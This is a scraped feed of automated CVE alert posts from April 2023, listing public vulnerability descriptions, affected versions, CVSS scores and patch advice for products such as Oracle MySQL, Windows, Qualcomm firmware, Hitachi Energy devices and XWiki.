🚨 CVE-2023-21991Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.44 and Prior to 7.0.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 3.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-04-19 22:58:26 |
🚨 CVE-2023-28292Raw Image Extension Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-19 22:58:25 |
🚨 CVE-2023-21976Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-19 22:58:24 |
🚨 CVE-2023-28293Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-19 22:58:23 |
🚨 CVE-2023-28296Visual Studio Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-19 22:58:19 |
🚨 CVE-2023-28297Windows Remote Procedure Call Service (RPCSS) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-19 22:58:18 |
🚨 CVE-2023-21918Vulnerability in the Oracle Database Recovery Manager component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Easily exploitable vulnerability allows high privileged attacker having Local SYSDBA privilege with network access via Oracle Net to compromise Oracle Database Recovery Manager. While the vulnerability is in Oracle Database Recovery Manager, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Database Recovery Manager. CVSS 3.1 Base Score 6.8 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-19 22:58:17 |
🚨 CVE-2023-21903Vulnerability in the Oracle Banking Virtual Account Management product of Oracle Financial Services Applications (component: OBVAM Internal Tfr Domain). Supported versions that are affected are 14.5, 14.6 and 14.7. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Banking Virtual Account Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Banking Virtual Account Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Banking Virtual Account Management accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Banking Virtual Account Management. CVSS 3.1 Base Score 5.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:L).🎖@cveNotify |
|
| 2023-04-19 22:58:16 |
🚨 CVE-2023-21913Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-04-19 20:58:13 |
🚨 CVE-2023-29571Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via gc_sweep at src/mjs_gc.c. This vulnerability can lead to a Denial of Service (DoS).🎖@cveNotify |
|
| 2023-04-19 20:58:12 |
🚨 CVE-2023-27704Void Tools Everything lower than v1.4.1.1022 was discovered to contain a Regular Expression Denial of Service (ReDoS).🎖@cveNotify |
|
| 2023-04-19 18:58:44 |
🚨 CVE-2022-33213Memory corruption in modem due to buffer overflow while processing a PPP packet🎖@cveNotify |
|
| 2023-04-19 18:58:42 |
🚨 CVE-2022-33242Memory corruption due to improper authentication in Qualcomm IPC while loading unsigned lib in audio PD.🎖@cveNotify |
|
| 2023-04-19 18:58:41 |
🚨 CVE-2022-33244Transient DOS due to reachable assertion in modem during MIB reception and SIB timeout🎖@cveNotify |
|
| 2023-04-19 18:58:40 |
🚨 CVE-2022-33250Transient DOS due to reachable assertion in modem when network repeatedly sent invalid message container for NR to LTE handover.🎖@cveNotify |
|
| 2023-04-19 18:58:39 |
🚨 CVE-2022-33254Transient DOS due to reachable assertion in Modem while processing SIB1 Message.🎖@cveNotify |
|
| 2023-04-19 18:58:38 |
🚨 CVE-2022-33256Memory corruption due to improper validation of array index in Multi-mode call processor.🎖@cveNotify |
|
| 2023-04-19 18:58:37 |
🚨 CVE-2022-33257Memory corruption in Core due to time-of-check time-of-use race condition during dump collection in trust zone.🎖@cveNotify |
|
| 2023-04-19 18:58:35 |
🚨 CVE-2022-33260Memory corruption due to stack based buffer overflow in core while sending command from USB of large size.🎖@cveNotify |
|
| 2023-04-19 18:58:34 |
🚨 CVE-2022-33272Transient DOS in modem due to reachable assertion.🎖@cveNotify |
|
| 2023-04-19 18:58:32 |
🚨 CVE-2022-33278Memory corruption due to buffer copy without checking the size of input in HLOS when input message size is larger than the buffer capacity.🎖@cveNotify |
|
| 2023-04-19 18:58:31 |
🚨 CVE-2022-33309Transient DOS due to buffer over-read in WLAN Firmware while parsing secure FTMR frame with size lesser than 39 Bytes.🎖@cveNotify |
|
| 2023-04-19 18:58:30 |
🚨 CVE-2022-40515Memory corruption in Video due to double free while playing 3gp clip with invalid metadata atoms.🎖@cveNotify |
|
| 2023-04-19 18:58:28 |
🚨 CVE-2022-40527Transient DOS due to reachable assertion in WLAN while processing PEER ID populated by TQM.🎖@cveNotify |
|
| 2023-04-19 18:58:27 |
🚨 CVE-2022-40531Memory corruption in WLAN due to incorrect type cast while sending WMI_SCAN_SCH_PRIO_TBL_CMDID message.🎖@cveNotify |
|
| 2023-04-19 18:58:26 |
🚨 CVE-2022-40537Memory corruption in Bluetooth HOST while processing the AVRC_PDU_GET_PLAYER_APP_VALUE_TEXT AVRCP response.🎖@cveNotify |
|
| 2023-04-19 18:58:25 |
🚨 CVE-2022-40540Memory corruption due to buffer copy without checking the size of input while loading firmware in Linux Kernel.🎖@cveNotify |
|
| 2023-04-19 18:58:24 |
🚨 CVE-2022-33277Memory corruption in modem due to buffer copy without checking size of input while receiving WMI command.🎖@cveNotify |
|
| 2023-04-19 18:58:22 |
🚨 CVE-2022-34146Transient DOS due to improper input validation in WLAN Host while parsing frame during defragmentation.🎖@cveNotify |
|
| 2023-04-19 18:58:21 |
🚨 CVE-2022-33243Memory corruption due to improper access control in Qualcomm IPC.🎖@cveNotify |
|
| 2023-04-19 18:58:20 |
🚨 CVE-2022-33248Memory corruption in User Identity Module due to integer overflow to buffer overflow when a segement is received via qmi http.🎖@cveNotify |
|
| 2023-04-19 17:58:43 |
🚨 CVE-2021-40336A vulnerability exists in the http web interface where the web interface does not validate data in an HTTP header. This causes a possible HTTP response splitting, which if exploited could lead an attacker to channel down harmful code into the user’s web browser, such as to steal the session cookies. Thus, an attacker who successfully makes an MSM user who has already established a session to MSM web interface clicks a forged link to the MSM web interface, e.g., the link is sent per E-Mail, could trick the user into downloading malicious software onto his computer. This issue affects: Hitachi Energy MSM V2.2 and prior versions.🎖@cveNotify |
|
| 2023-04-19 17:58:42 |
🚨 CVE-2021-35531Improper Input Validation vulnerability in a particular configuration setting field of Hitachi Energy TXpert Hub CoreTec 4 product, allows an attacker with access to an authorized user with ADMIN or ENGINEER role rights to inject an OS command that is executed by the system. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0; 2.0.1; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.🎖@cveNotify |
|
| 2023-04-19 17:58:41 |
🚨 CVE-2021-35532A vulnerability exists in the file upload validation part of Hitachi Energy TXpert Hub CoreTec 4 product. The vulnerability allows an attacker or malicious agent who manages to gain access to the system and obtain an account with sufficient privilege to upload a malicious firmware to the product. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0; 2.0.1; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.🎖@cveNotify |
|
| 2023-04-19 17:58:40 |
🚨 CVE-2022-28613A vulnerability in the HCI Modbus TCP COMPONENT of Hitachi Energy RTU500 series CMU Firmware that is caused by the validation error in the length information carried in MBAP header allows an ATTACKER to reboot the device by sending a special crafted message. This issue affects: Hitachi Energy RTU500 series CMU Firmware 12.0.*; 12.2.*; 12.4.*; 12.6.*; 12.7.*; 13.2.*.🎖@cveNotify |
|
| 2023-04-19 17:58:36 |
🚨 CVE-2021-35533Improper Input Validation vulnerability in the APDU parser in the Bidirectional Communication Interface (BCI) IEC 60870-5-104 function of Hitachi Energy RTU500 series allows an attacker to cause the receiving RTU500 CMU of which the BCI is enabled to reboot when receiving a specially crafted message. By default, BCI IEC 60870-5-104 function is disabled (not configured). This issue affects: Hitachi Energy RTU500 series CMU Firmware version 12.0.* (all versions); CMU Firmware version 12.2.* (all versions); CMU Firmware version 12.4.* (all versions).🎖@cveNotify |
|
| 2023-04-19 17:58:35 |
🚨 CVE-2021-35534Insufficient security control vulnerability in internal database access mechanism of Hitachi Energy Relion 670/650/SAM600-IO, Relion 650, GMS600, PWC600 allows attacker who successfully exploited this vulnerability, of which the product does not sufficiently restrict access to an internal database tables, could allow anybody with user credentials to bypass security controls that is enforced by the product. Consequently, exploitation may lead to unauthorized modifications on data/firmware, and/or to permanently disabling the product. This issue affects: Hitachi Energy Relion 670 Series 2.0 all revisions; 2.2.2 all revisions; 2.2.3 versions prior to 2.2.3.5. Hitachi Energy Relion 670/650 Series 2.1 all revisions. 2.2.0 all revisions; 2.2.4 all revisions; Hitachi Energy Relion 670/650/SAM600-IO 2.2.1 all revisions; 2.2.5 versions prior to 2.2.5.2. Hitachi Energy Relion 650 1.0 all revisions. 1.1 all revisions; 1.2 all revisions; 1.3 versions prior to 1.3.0.8; Hitachi Energy GMS600 1.3.0; 1.3.0.1; 1.2.0. Hitachi Energy PWC600 1.0.1 version 1.0.1.4 and prior versions; 1.1.0 version 1.1.0.1 and prior versions.🎖@cveNotify |
|
| 2023-04-19 17:58:34 |
🚨 CVE-2021-35535Insecure Boot Image vulnerability in Hitachi Energy Relion Relion 670/650/SAM600-IO series allows an attacker who manages to get access to the front network port and to cause a reboot sequences of the device may exploit the vulnerability, where there is a tiny time gap during the booting process where an older version of VxWorks is loaded prior to application firmware booting, could exploit the vulnerability in the older version of VxWorks and cause a denial-of-service on the product. This issue affects: Hitachi Energy Relion 670 Series 2.2.2 all revisions; 2.2.3 versions prior to 2.2.3.3. Hitachi Energy Relion 670/650 Series 2.2.0 all revisions; 2.2.4 all revisions. Hitachi Energy Relion 670/650/SAM600-IO 2.2.1 all revisions.🎖@cveNotify |
|
| 2023-04-19 17:58:33 |
🚨 CVE-2018-1168This vulnerability allows local attackers to escalate privileges on vulnerable installations of ABB MicroSCADA 9.3 with FP 1-2-3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of the access controls for the installed product files. The installation procedure leaves critical files open to manipulation by any authenticated user. An attacker can leverage this vulnerability to escalate privileges to SYSTEM. Was ZDI-CAN-5097.🎖@cveNotify |
|
| 2023-04-19 17:58:29 |
🚨 CVE-2023-22660A heap-based buffer overflow vulnerability exists in the way Ichitaro version 2022 1.0.1.57600 processes certain LayoutBox stream record types. A specially crafted document can cause a buffer overflow, leading to memory corruption, which can result in arbitrary code execution.To trigger this vulnerability, the victim would need to open a malicious, attacker-created document.🎖@cveNotify |
|
| 2023-04-19 17:58:28 |
🚨 CVE-2023-28273Windows Clip Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-19 17:58:27 |
🚨 CVE-2023-28270Windows Lock Screen Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-04-19 17:58:26 |
🚨 CVE-2023-29586Code Sector TeraCopy 3.9.7 does not perform proper access validation on the source folder during a copy operation. This leads to Arbitrary File Read by allowing any user to copy any directory in the system to a directory they control.🎖@cveNotify |
|
| 2023-04-19 17:58:22 |
🚨 CVE-2022-22960VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to 'root'.🎖@cveNotify |
|
| 2023-04-19 17:58:21 |
🚨 CVE-2023-28269Windows Boot Manager Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-04-19 17:58:20 |
🚨 CVE-2023-28274Windows Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-19 17:58:19 |
🚨 CVE-2023-28277Windows DNS Server Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-04-19 14:58:40 |
🚨 CVE-2023-23375Microsoft ODBC and OLE DB Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-19 14:58:39 |
🚨 CVE-2023-23384Microsoft SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-19 14:58:38 |
🚨 CVE-2023-24860Microsoft Defender Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-04-19 14:58:34 |
🚨 CVE-2023-28246Windows Registry Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-19 14:58:32 |
🚨 CVE-2023-28247Windows Network File System Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-04-19 14:58:31 |
🚨 CVE-2023-28248Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-19 14:58:30 |
🚨 CVE-2023-28249Windows Boot Manager Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-04-19 14:58:29 |
🚨 CVE-2023-28254Windows DNS Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-19 14:58:27 |
🚨 CVE-2023-24626socket.c in GNU Screen through 4.9.0, when installed setuid or setgid (the default on platforms such as Arch Linux and FreeBSD), allows local users to send a privileged SIGHUP signal to any PID, causing a denial of service or disruption of the target process.🎖@cveNotify |
|
| 2023-04-19 14:58:26 |
🚨 CVE-2023-22645An Improper Privilege Management vulnerability in SUSE kubewarden allows attackers to read arbitrary secrets if they get access to the ServiceAccount kubewarden-controller This issue affects: SUSE kubewarden kubewarden-controller versions prior to 1.6.0.🎖@cveNotify |
|
| 2023-04-19 14:58:25 |
🚨 CVE-2023-27777Cross-site scripting (XSS) vulnerability was discovered in Online Jewelry Shop v1.0 that allows attackers to execute arbitrary script via a crafted URL.🎖@cveNotify |
|
| 2023-04-19 14:58:24 |
🚨 CVE-2022-38125Improper Restriction of Communication Channel to Intended Endpoints vulnerability in Secomea SiteManager (FTP Agent modules) allows Exploiting Trust in Client.🎖@cveNotify |
|
| 2023-04-19 14:58:23 |
🚨 CVE-2022-4308Plaintext Storage of a Password vulnerability in Secomea GateManager (USB wizard) allows Authentication abuse on SiteManager, if the generated file is leaked.🎖@cveNotify |
|
| 2023-04-19 14:58:22 |
🚨 CVE-2023-0317Unprotected Alternate Channel vulnerability in debug console of GateManager allows system administrator to obtain sensitive information.🎖@cveNotify |
|
| 2023-04-19 14:58:20 |
🚨 CVE-2023-25759OS Command Injection in TripleData Reporting Engine in Tripleplay Platform releases prior to Caveman 3.4.0 allows authenticated users to run unprivileged OS level commands via a crafted request payload.🎖@cveNotify |
|
| 2023-04-19 14:58:19 |
🚨 CVE-2023-25760Incorrect Access Control in Tripleplay Platform releases prior to Caveman 3.4.0 allows authenticated user to modify other users passwords via a crafted request payload🎖@cveNotify |
|
| 2023-04-19 14:58:18 |
🚨 CVE-2023-26599XSS vulnerability in TripleSign in Tripleplay Platform releases prior to Caveman 3.4.0 allows attackers to inject client-side code to run as an authenticated user via a crafted link.🎖@cveNotify |
|
| 2023-04-19 14:58:17 |
🚨 CVE-2023-27776A stored cross-site scripting (XSS) vulnerability in /index.php?page=category_list of Online Jewelry Shop v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Category Name parameter.🎖@cveNotify |
|
| 2023-04-19 14:58:16 |
🚨 CVE-2023-29921PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create app interface.🎖@cveNotify |
|
| 2023-04-19 14:58:15 |
🚨 CVE-2023-30463Altran picoTCP through 1.7.0 allows memory corruption (and subsequent denial of service) because of an integer overflow in pico_ipv6_alloc when processing large ICMPv6 packets. This affects installations with Ethernet support in which a packet size greater than 65495 may occur.🎖@cveNotify |
|
| 2023-04-19 12:58:14 |
🚨 CVE-2023-2168The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Suggest Terms Title field in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-04-19 12:58:13 |
🚨 CVE-2023-2170The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Related Posts functionality in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-04-19 06:58:30 |
🚨 CVE-2023-27043The e-mail module of Python 0 - 2.7.18, 3.x - 3.11 incorrectly parses e-mail addresses which contain a special character. This vulnerability allows attackers to send messages from e-ail addresses that would otherwise be rejected.🎖@cveNotify |
|
| 2023-04-19 06:58:29 |
🚨 CVE-2023-29510XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In XWiki, every user can add translations that are only applied to the current user. This also allows overriding existing translations. Such translations are often included in privileged contexts without any escaping which allows remote code execution for any user who has edit access on at least one document which could be the user's own profile where edit access is enabled by default. A mitigation for this vulnerability is part of XWiki 14.10.2 and XWiki 15.0 RC1: translations with user scope now require script right. This means that regular users cannot exploit this anymore as users don't have script right by default anymore starting with XWiki 14.10. There are no known workarounds apart from upgrading to a patched versions.🎖@cveNotify |
|
| 2023-04-19 06:58:28 |
🚨 CVE-2023-29514XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with edit rights on any document (e.g., their own user profile) can execute code with programming rights, leading to remote code execution. This vulnerability has been patched in XWiki 13.10.11, 14.4.8, 14.10.1 and 15.0 RC1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-19 06:58:24 |
🚨 CVE-2023-29515XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user who can create a space can become admin of that space through App Within Minutes. The admin right implies the script right and thus allows JavaScript injection. The vulnerability can be exploited by creating an app in App Within Minutes. If the button should be disabled because the user doesn't have global edit right, the app can also be created by directly opening `/xwiki/bin/view/AppWithinMinutes/CreateApplication?wizard=true` on the XWiki installation. This has been patched in XWiki 13.10.11, 14.4.8, 14.10.1 and 15.0 RC1 by not granting the space admin right if the user doesn't have script right on the space where the app is created. Error message are displayed to warn the user that the app will be broken in this case. Users who became space admin through this vulnerability won't loose the space admin right due to the fix, so it is advised to check if all users who created AWM apps should keep their space admin rights. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-19 06:58:23 |
🚨 CVE-2023-29516XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with view rights on `XWiki.AttachmentSelector` can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping in the "Cancel and return to page" button. This page is installed by default. This vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-19 06:58:22 |
🚨 CVE-2023-29518XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with view rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of `Invitation.InvitationCommon`. This page is installed by default. The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-19 06:58:19 |
🚨 CVE-2023-29519XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. A registered user can perform remote code execution leading to privilege escalation by injecting the proper code in the "property" field of an attachment selector, as a gadget of their own dashboard. Note that the vulnerability does not impact comments of a wiki. The vulnerability has been patched in XWiki 13.10.11, 14.4.8, 14.10.2, 15.0-rc-1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-19 06:58:18 |
🚨 CVE-2023-29520XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It's possible to break many translations coming from wiki pages by creating a corrupted document containing a translation object. This will lead to a broken page. The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11. Users are advised to upgrade. There are no workarounds other than fixing any way to create a document that fail to load.🎖@cveNotify |
|
| 2023-04-19 06:58:17 |
🚨 CVE-2023-29521XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with view rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of `Macro.VFSTreeMacro`. This page is not installed by default.This vulnerability has been patched in XWiki 15.0-rc-1, 14.10.2, 14.4.8, 13.10.11. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-19 06:58:13 |
🚨 CVE-2023-29522XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with view rights can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. This issue has been patched in XWiki 14.4.8, 14.10.3 and 15.0RC1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-19 06:58:12 |
🚨 CVE-2023-29523XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user who can edit their own user profile can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The same vulnerability can also be exploited in other contexts where the `display` method on a document is used to display a field with wiki syntax, for example in applications created using `App Within Minutes`. This has been patched in XWiki 13.10.11, 14.4.8, 14.10.2 and 15.0RC1. There is no workaround apart from upgrading.🎖@cveNotify |
|
| 2023-04-19 06:58:11 |
🚨 CVE-2023-29523XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user who can edit their own user profile can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The same vulnerability can also be exploited in other contexts where the `display` method on a document is used to display a field with wiki syntax, for example in applications created using `App Within Minutes`. This has been patched in XWiki 13.10.11, 14.4.8, 14.10.2 and 15.0RC1. There is no workaround apart from upgrading.🎖@cveNotify |
|
| 2023-04-19 00:58:20 |
🚨 CVE-2023-28004A CWE-129: Improper validation of an array index vulnerability exists where a specially craftedEthernet request could result in denial of service or remote code execution. 🎖@cveNotify |
|
| 2023-04-19 00:58:19 |
🚨 CVE-2023-29002Cilium is a networking, observability, and security solution with an eBPF-based dataplane. When run in debug mode, Cilium will log the contents of the `cilium-secrets` namespace. This could include data such as TLS private keys for Ingress and GatewayAPI resources. An attacker with access to debug output from the Cilium containers could use the resulting output to intercept and modify traffic to and from the affected cluster. Output of the sensitive information would occur at Cilium agent restart, when secrets in the namespace are modified, and on creation of Ingress or GatewayAPI resources. This vulnerability is fixed in Cilium releases 1.11.16, 1.12.9, and 1.13.2. Users unable to upgrade should disable debug mode.🎖@cveNotify |
|
| 2023-04-19 00:58:15 |
🚨 CVE-2023-29196Discourse is an open source platform for community discussion. This vulnerability is not exploitable on the default install of Discourse. A custom feature must be enabled for it to work at all, and the attacker’s payload must pass the CSP to be executed. However, if an attacker succeeds in embedding Javascript that does pass the CSP, it could result in session hijacking for any users that view the attacker’s post. The vulnerability is patched in the latest tests-passed, beta and stable branches. Users are advised to upgrade. Users unable to upgrade should enable and/or restore your site's CSP to the default one provided with Discourse. Remove any embed-able hosts configured.🎖@cveNotify |
|
| 2023-04-19 00:58:14 |
🚨 CVE-2023-29410A CWE-20: Improper Input Validation vulnerability exists that could allow an authenticatedattacker to gain the same privilege as the application on the server when a malicious payload isprovided over HTTP for the server to execute. 🎖@cveNotify |
|
| 2023-04-19 00:58:13 |
🚨 CVE-2023-30606Discourse is an open source platform for community discussion. In affected versions a user logged as an administrator can call arbitrary methods on the `SiteSetting` class, notably `#clear_cache!` and `#notify_changed!`, which when done on a multisite instance, can affect the entire cluster resulting in a denial of service. Users not running in multisite environments are not affected. This issue is patched in the latest stable, beta and tests-passed versions of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-19 00:58:12 |
🚨 CVE-2023-30608sqlparse is a non-validating SQL parser module for Python. In affected versions the SQL parser contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service). This issue was introduced by commit `e75e358`. The vulnerability may lead to Denial of Service (DoS). This issues has been fixed in sqlparse 0.4.4 by commit `c457abd5f`. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-18 22:58:39 |
🚨 CVE-2023-25551A CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-siteScripting') vulnerability exists on a DCE file upload endpoint when tampering with parametersover HTTP. Affected products: StruxureWare Data Center Expert (V7.9.2 and prior)🎖@cveNotify |
|
| 2023-04-18 22:58:38 |
🚨 CVE-2023-25552A CWE-862: Missing Authorization vulnerability exists that could allow viewing of unauthorizedcontent, changes or deleting of content, or performing unauthorized functions when tamperingthe Device File Transfer settings on DCE endpoints. Affected products: StruxureWare Data Center Expert (V7.9.2 and prior)🎖@cveNotify |
|
| 2023-04-18 22:58:37 |
🚨 CVE-2023-25552A CWE-862: Missing Authorization vulnerability exists that could allow viewing of unauthorizedcontent, changes or deleting of content, or performing unauthorized functions when tamperingthe Device File Transfer settings on DCE endpoints. Affected products: StruxureWare Data Center Expert (V7.9.2 and prior)🎖@cveNotify |
|
| 2023-04-18 22:58:36 |
🚨 CVE-2023-25553A CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-siteScripting') vulnerability exists on a DCE endpoint through the logging capabilities of thewebserver. Affected products: StruxureWare Data Center Expert (V7.9.2 and prior)🎖@cveNotify |
|
| 2023-04-18 22:58:35 |
🚨 CVE-2023-25554A CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OSCommand Injection') vulnerability exists that allows a local privilege escalation on the appliancewhen a maliciously crafted Operating System command is entered on the device. Affected products: StruxureWare Data Center Expert (V7.9.2 and prior)🎖@cveNotify |
|
| 2023-04-18 22:58:31 |
🚨 CVE-2023-25554A CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OSCommand Injection') vulnerability exists that allows a local privilege escalation on the appliancewhen a maliciously crafted Operating System command is entered on the device. Affected products: StruxureWare Data Center Expert (V7.9.2 and prior)🎖@cveNotify |
|
| 2023-04-18 22:58:30 |
🚨 CVE-2023-25555A CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OSCommand Injection') vulnerability exists that could allow a user that knows the credentials toexecute unprivileged shell commands on the appliance over SSH. Affected products: StruxureWare Data Center Expert (V7.9.2 and prior)🎖@cveNotify |
|
| 2023-04-18 22:58:29 |
🚨 CVE-2023-25555A CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OSCommand Injection') vulnerability exists that could allow a user that knows the credentials toexecute unprivileged shell commands on the appliance over SSH. Affected products: StruxureWare Data Center Expert (V7.9.2 and prior)🎖@cveNotify |
|
| 2023-04-18 22:58:28 |
🚨 CVE-2023-26048Jetty is a java based web server and servlet engine. In affected versions servlets with multipart support (e.g. annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and very large content. This happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`. However, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time. This issue has been patched in versions 9.4.51, 10.0.14, and 11.0.14. Users are advised to upgrade. Users unable to upgrade may set the multipart parameter `maxRequestSize` which must be set to a non-negative value, so the whole multipart content is limited (although still read into memory).🎖@cveNotify |
|
| 2023-04-18 22:58:27 |
🚨 CVE-2023-26048Jetty is a java based web server and servlet engine. In affected versions servlets with multipart support (e.g. annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and very large content. This happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`. However, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time. This issue has been patched in versions 9.4.51, 10.0.14, and 11.0.14. Users are advised to upgrade. Users unable to upgrade may set the multipart parameter `maxRequestSize` which must be set to a non-negative value, so the whole multipart content is limited (although still read into memory).🎖@cveNotify |
|
| 2023-04-18 22:58:23 |
